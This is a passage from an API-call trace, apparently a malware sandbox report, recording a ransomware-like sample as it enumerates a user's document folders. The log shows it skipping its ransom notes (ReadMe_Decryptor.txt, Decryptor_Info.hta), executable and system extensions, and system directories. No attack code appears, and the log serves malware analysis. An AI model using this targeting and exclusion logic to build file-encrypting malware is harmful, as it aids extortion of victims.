ftCreationTime.dwHighDateTime=0x1d5e3d0, ftLastAccessTime.dwLowDateTime=0x1123d590, ftLastAccessTime.dwHighDateTime=0x1d5d9a5, ftLastWriteTime.dwLowDateTime=0x1123d590, ftLastWriteTime.dwHighDateTime=0x1d5d9a5, nFileSizeHigh=0x0, nFileSizeLow=0x81db, dwReserved0=0x0, dwReserved1=0x0, cFileName="bMwb4A9x4LoFtk.docx", cAlternateFileName="BMWB4A~1.DOC")) returned 1 [0105.198] lstrcmpW (lpString1="bMwb4A9x4LoFtk.docx", lpString2=".") returned 1 [0105.198] lstrcmpW (lpString1="bMwb4A9x4LoFtk.docx", lpString2="..") returned 1 [0105.198] lstrcmpiW (lpString1="bMwb4A9x4LoFtk.docx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.198] lstrcmpiW (lpString1="bMwb4A9x4LoFtk.docx", lpString2="Decryptor_Info.hta") returned -1 [0105.198] PathFindExtensionW (pszPath="bMwb4A9x4LoFtk.docx") returned=".docx" [0105.198] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.198] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.198] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.198] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.198] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9590 [0105.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x7af620 [0105.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9590 | out: hHeap=0x6d0000) returned 1 [0105.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75cf00 [0105.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.198] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86c432a0, ftCreationTime.dwHighDateTime=0x1d5dd1e, ftLastAccessTime.dwLowDateTime=0x79073d00, ftLastAccessTime.dwHighDateTime=0x1d5dd74, ftLastWriteTime.dwLowDateTime=0x79073d00, ftLastWriteTime.dwHighDateTime=0x1d5dd74, nFileSizeHigh=0x0, nFileSizeLow=0x8590, dwReserved0=0x0, dwReserved1=0x0, cFileName="di02.rtf", cAlternateFileName="")) returned 1 [0105.198] lstrcmpW (lpString1="di02.rtf", lpString2=".") returned 1 [0105.198] lstrcmpW (lpString1="di02.rtf", lpString2="..") returned 1 [0105.198] lstrcmpiW (lpString1="di02.rtf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.198] lstrcmpiW (lpString1="di02.rtf", lpString2="Decryptor_Info.hta") returned 1 [0105.198] PathFindExtensionW (pszPath="di02.rtf") returned=".rtf" [0105.198] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0105.198] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0105.198] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0105.199] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0105.199] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0105.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9590 [0105.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x7af620 [0105.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9590 | out: hHeap=0x6d0000) returned 1 [0105.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7af730 [0105.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.199] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86c432a0, ftCreationTime.dwHighDateTime=0x1d5dd1e, ftLastAccessTime.dwLowDateTime=0x79073d00, ftLastAccessTime.dwHighDateTime=0x1d5dd74, ftLastWriteTime.dwLowDateTime=0x79073d00, ftLastWriteTime.dwHighDateTime=0x1d5dd74, nFileSizeHigh=0x0, nFileSizeLow=0x8590, dwReserved0=0x0, dwReserved1=0x0, cFileName="di02.rtf", cAlternateFileName="")) returned 0 [0105.199] FindClose (in: hFindFile=0x72abb8 | out: hFindFile=0x72abb8) returned 1 [0105.199] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0957a0, ftCreationTime.dwHighDateTime=0x1d5dbda, ftLastAccessTime.dwLowDateTime=0x538e5130, ftLastAccessTime.dwHighDateTime=0x1d5dfb8, ftLastWriteTime.dwLowDateTime=0x538e5130, ftLastWriteTime.dwHighDateTime=0x1d5dfb8, nFileSizeHigh=0x0, nFileSizeLow=0x683a, dwReserved0=0x0, dwReserved1=0x0, cFileName="q9PBr.odp", cAlternateFileName="")) returned 1 [0105.199] lstrcmpW (lpString1="q9PBr.odp", lpString2=".") returned 1 [0105.199] lstrcmpW (lpString1="q9PBr.odp", lpString2="..") returned 1 [0105.199] lstrcmpiW (lpString1="q9PBr.odp", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.199] lstrcmpiW (lpString1="q9PBr.odp", lpString2="Decryptor_Info.hta") returned 1 [0105.199] PathFindExtensionW (pszPath="q9PBr.odp") returned=".odp" [0105.199] lstrcmpiW (lpString1=".odp", lpString2=".exe") returned 1 [0105.199] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0105.199] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0105.199] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0105.199] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0105.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7af4d0 [0105.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x7af620 [0105.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9590 [0105.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.200] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11b5830, ftCreationTime.dwHighDateTime=0x1d5e602, ftLastAccessTime.dwLowDateTime=0x82033d90, ftLastAccessTime.dwHighDateTime=0x1d5e09f, ftLastWriteTime.dwLowDateTime=0x82033d90, ftLastWriteTime.dwHighDateTime=0x1d5e09f, nFileSizeHigh=0x0, nFileSizeLow=0xfda2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ttIR1y8rGjuXrKO.odt", cAlternateFileName="TTIR1Y~1.ODT")) returned 1 [0105.200] lstrcmpW (lpString1="ttIR1y8rGjuXrKO.odt", lpString2=".") returned 1 [0105.200] lstrcmpW (lpString1="ttIR1y8rGjuXrKO.odt", lpString2="..") returned 1 [0105.200] lstrcmpiW (lpString1="ttIR1y8rGjuXrKO.odt", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.200] lstrcmpiW (lpString1="ttIR1y8rGjuXrKO.odt", lpString2="Decryptor_Info.hta") returned 1 [0105.200] PathFindExtensionW (pszPath="ttIR1y8rGjuXrKO.odt") returned=".odt" [0105.200] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0105.200] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0105.200] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0105.200] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0105.200] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0105.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7af4d0 [0105.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x7af620 [0105.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7afa00 [0105.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.200] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe08100a0, ftCreationTime.dwHighDateTime=0x1d5da05, ftLastAccessTime.dwLowDateTime=0x910ee8e0, ftLastAccessTime.dwHighDateTime=0x1d5e17e, ftLastWriteTime.dwLowDateTime=0x910ee8e0, ftLastWriteTime.dwHighDateTime=0x1d5e17e, nFileSizeHigh=0x0, nFileSizeLow=0x51bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="zMuEM6hwu.ppt", cAlternateFileName="ZMUEM6~1.PPT")) returned 1 [0105.200] lstrcmpW (lpString1="zMuEM6hwu.ppt", lpString2=".") returned 1 [0105.200] lstrcmpW (lpString1="zMuEM6hwu.ppt", lpString2="..") returned 1 [0105.200] lstrcmpiW (lpString1="zMuEM6hwu.ppt", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.200] lstrcmpiW (lpString1="zMuEM6hwu.ppt", lpString2="Decryptor_Info.hta") returned 1 [0105.200] PathFindExtensionW (pszPath="zMuEM6hwu.ppt") returned=".ppt" [0105.201] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0105.201] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0105.201] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0105.201] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0105.201] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0105.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7af4d0 [0105.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x7af620 [0105.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0105.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.201] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe08100a0, ftCreationTime.dwHighDateTime=0x1d5da05, ftLastAccessTime.dwLowDateTime=0x910ee8e0, ftLastAccessTime.dwHighDateTime=0x1d5e17e, ftLastWriteTime.dwLowDateTime=0x910ee8e0, ftLastWriteTime.dwHighDateTime=0x1d5e17e, nFileSizeHigh=0x0, nFileSizeLow=0x51bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="zMuEM6hwu.ppt", cAlternateFileName="ZMUEM6~1.PPT")) returned 0 [0105.201] FindClose (in: hFindFile=0x77e610 | out: hFindFile=0x77e610) returned 1 [0105.201] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa863d720, ftCreationTime.dwHighDateTime=0x1d5e1c5, ftLastAccessTime.dwLowDateTime=0xd632f260, ftLastAccessTime.dwHighDateTime=0x1d5e203, ftLastWriteTime.dwLowDateTime=0xd632f260, ftLastWriteTime.dwHighDateTime=0x1d5e203, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kze0OTs", cAlternateFileName="")) returned 1 [0105.201] lstrcmpW (lpString1="kze0OTs", lpString2=".") returned 1 [0105.201] lstrcmpW (lpString1="kze0OTs", lpString2="..") returned 1 [0105.201] lstrlenW (lpString="kze0OTs") returned 7 [0105.201] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\", lpString2="kze0OTs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs" [0105.201] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Windows") returned -1 [0105.201] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.201] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.201] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\ProgramData") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Intel") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\msys32") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Qt") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\ProgramData") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Program Files") returned 1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Windows") returned -1 [0105.202] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="C:\\Program Files (x86)") returned 1 [0105.202] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\" [0105.202] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\") returned 68 [0105.202] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e610 [0105.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.205] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa863d720, ftCreationTime.dwHighDateTime=0x1d5e1c5, ftLastAccessTime.dwLowDateTime=0xd632f260, ftLastAccessTime.dwHighDateTime=0x1d5e203, ftLastWriteTime.dwLowDateTime=0xd632f260, ftLastWriteTime.dwHighDateTime=0x1d5e203, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.207] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bd810, ftCreationTime.dwHighDateTime=0x1d5dc40, ftLastAccessTime.dwLowDateTime=0x4865d760, ftLastAccessTime.dwHighDateTime=0x1d5ddc4, ftLastWriteTime.dwLowDateTime=0x4865d760, ftLastWriteTime.dwHighDateTime=0x1d5ddc4, nFileSizeHigh=0x0, nFileSizeLow=0x16aeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="52FjfcR9Co.xlsx", cAlternateFileName="52FJFC~1.XLS")) returned 1 [0105.207] lstrcmpW (lpString1="52FjfcR9Co.xlsx", lpString2=".") returned 1 [0105.207] lstrcmpW (lpString1="52FjfcR9Co.xlsx", lpString2="..") returned 1 [0105.207] lstrcmpiW (lpString1="52FjfcR9Co.xlsx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.207] lstrcmpiW (lpString1="52FjfcR9Co.xlsx", lpString2="Decryptor_Info.hta") returned -1 [0105.207] PathFindExtensionW (pszPath="52FjfcR9Co.xlsx") returned=".xlsx" [0105.207] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0105.207] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0105.207] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0105.207] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0105.207] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0105.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.208] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0105.208] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.208] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6852930, ftCreationTime.dwHighDateTime=0x1d5de62, ftLastAccessTime.dwLowDateTime=0xe158bbb0, ftLastAccessTime.dwHighDateTime=0x1d5d944, ftLastWriteTime.dwLowDateTime=0xe158bbb0, ftLastWriteTime.dwHighDateTime=0x1d5d944, nFileSizeHigh=0x0, nFileSizeLow=0xdbb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8tNv6sMqzXXl M.ots", cAlternateFileName="8TNV6S~1.OTS")) returned 1 [0105.208] lstrcmpW (lpString1="8tNv6sMqzXXl M.ots", lpString2=".") returned 1 [0105.208] lstrcmpW (lpString1="8tNv6sMqzXXl M.ots", lpString2="..") returned 1 [0105.208] lstrcmpiW (lpString1="8tNv6sMqzXXl M.ots", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.208] lstrcmpiW (lpString1="8tNv6sMqzXXl M.ots", lpString2="Decryptor_Info.hta") returned -1 [0105.208] PathFindExtensionW (pszPath="8tNv6sMqzXXl M.ots") returned=".ots" [0105.208] lstrcmpiW (lpString1=".ots", lpString2=".exe") returned 1 [0105.208] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0105.208] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0105.208] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0105.208] lstrcmpiW (lpString1=".ots", lpString2=".msi") returned 1 [0105.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.208] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9928 [0105.208] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.208] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e2fdb0, ftCreationTime.dwHighDateTime=0x1d5e245, ftLastAccessTime.dwLowDateTime=0x1699c650, ftLastAccessTime.dwHighDateTime=0x1d5e518, ftLastWriteTime.dwLowDateTime=0x1699c650, ftLastWriteTime.dwHighDateTime=0x1d5e518, nFileSizeHigh=0x0, nFileSizeLow=0x107b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ljV0AFrtFxxFy9Liq.pptx", cAlternateFileName="LJV0AF~1.PPT")) returned 1 [0105.209] lstrcmpW (lpString1="ljV0AFrtFxxFy9Liq.pptx", lpString2=".") returned 1 [0105.209] lstrcmpW (lpString1="ljV0AFrtFxxFy9Liq.pptx", lpString2="..") returned 1 [0105.209] lstrcmpiW (lpString1="ljV0AFrtFxxFy9Liq.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.209] lstrcmpiW (lpString1="ljV0AFrtFxxFy9Liq.pptx", lpString2="Decryptor_Info.hta") returned 1 [0105.209] PathFindExtensionW (pszPath="ljV0AFrtFxxFy9Liq.pptx") returned=".pptx" [0105.209] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.209] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.209] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.209] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.210] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.210] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7afac8 [0105.210] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.210] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d33a80, ftCreationTime.dwHighDateTime=0x1d5d87c, ftLastAccessTime.dwLowDateTime=0xf5c2e0e0, ftLastAccessTime.dwHighDateTime=0x1d5d99d, ftLastWriteTime.dwLowDateTime=0xf5c2e0e0, ftLastWriteTime.dwHighDateTime=0x1d5d99d, nFileSizeHigh=0x0, nFileSizeLow=0x382a, dwReserved0=0x0, dwReserved1=0x0, cFileName="mgEq0F12.docx", cAlternateFileName="MGEQ0F~1.DOC")) returned 1 [0105.210] lstrcmpW (lpString1="mgEq0F12.docx", lpString2=".") returned 1 [0105.210] lstrcmpW (lpString1="mgEq0F12.docx", lpString2="..") returned 1 [0105.210] lstrcmpiW (lpString1="mgEq0F12.docx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.210] lstrcmpiW (lpString1="mgEq0F12.docx", lpString2="Decryptor_Info.hta") returned 1 [0105.210] PathFindExtensionW (pszPath="mgEq0F12.docx") returned=".docx" [0105.210] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.211] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.211] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.211] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.211] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e99e0 [0105.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.211] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46a4b890, ftCreationTime.dwHighDateTime=0x1d5df47, ftLastAccessTime.dwLowDateTime=0x97f05a90, ftLastAccessTime.dwHighDateTime=0x1d5dd19, ftLastWriteTime.dwLowDateTime=0x97f05a90, ftLastWriteTime.dwHighDateTime=0x1d5dd19, nFileSizeHigh=0x0, nFileSizeLow=0x9a14, dwReserved0=0x0, dwReserved1=0x0, cFileName="nwhNds84oriBnceLbT.ots", cAlternateFileName="NWHNDS~1.OTS")) returned 1 [0105.211] lstrcmpW (lpString1="nwhNds84oriBnceLbT.ots", lpString2=".") returned 1 [0105.211] lstrcmpW (lpString1="nwhNds84oriBnceLbT.ots", lpString2="..") returned 1 [0105.211] lstrcmpiW (lpString1="nwhNds84oriBnceLbT.ots", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.211] lstrcmpiW (lpString1="nwhNds84oriBnceLbT.ots", lpString2="Decryptor_Info.hta") returned 1 [0105.211] PathFindExtensionW (pszPath="nwhNds84oriBnceLbT.ots") returned=".ots" [0105.211] lstrcmpiW (lpString1=".ots", lpString2=".exe") returned 1 [0105.211] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0105.211] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0105.211] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0105.211] lstrcmpiW (lpString1=".ots", lpString2=".msi") returned 1 [0105.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af4d0 [0105.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7af620 [0105.212] HeapFree (in: 